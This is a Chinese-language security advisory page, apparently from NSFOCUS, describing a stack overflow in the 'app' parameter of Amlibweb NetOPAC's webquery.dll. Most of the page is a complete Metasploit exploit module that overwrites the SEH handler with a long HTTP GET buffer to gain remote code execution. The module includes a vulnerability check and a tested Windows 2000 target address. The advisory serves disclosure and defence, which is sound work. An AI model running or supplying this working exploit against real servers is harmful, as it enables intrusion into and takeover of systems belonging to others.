安全研究
安全漏洞
Amlib Amlibweb Library Management System webquery.dll app参数溢出漏洞
发布日期:2010-08-03
更新日期:2010-10-25
受影响系统:
Amlib NetOPAC 5.2.0.4描述:
BUGTRAQ ID: 42293
Amlibweb Library Management System是库管理系统。
Amlibweb Library Management System在实现上存在栈缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。
<*来源:Patrick Webster (pwebster@ausgeo.com.au)
链接:http://osvdb.org/66814
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# $Id: amlibweb_webquerydll_app.rb 9953 2010-08-03 16:17:43Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Amlib's Amlibweb
Library Management System (NetOpacs). The webquery.dll
API is available through IIS requests. By specifying
an overly long string to the 'app' parameter, SeH can be
reliably overwritten allowing for arbitrary remote code execution.
In addition, it is possible to overwrite EIP by specifying
an arbitrary parameter name with an '=' terminator.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9953 $',
'References' =>
[
[ 'OSVDB', '66814'],
[ 'URL', 'http://www.aushack.com/advisories/' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'DisableNops' => 'True',
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
# patrickw - Tested OK 20100803 w2k IIS5
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
],
'DisclosureDate' => 'Aug 03 2010', #0day
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
],self.class)
end
def check
connect
rand = Rex::Text.rand_text_alpha(10)
sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")
res = sock.get(-1,3)
disconnect
if (res =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)
if ($1 == rand)
return Exploit::CheckCode::Vulnerable
end
end
Exploit::CheckCode::Safe
end
def exploit
connect
seh = generate_seh_payload(target.ret)
buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
建议:
厂商补丁:
Amlib
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.amlib.co.uk/services/netopac.aspx?menuId=top_services_netopac
浏览次数:1723
严重程度:0(网友投票)
绿盟科技给您安全的保障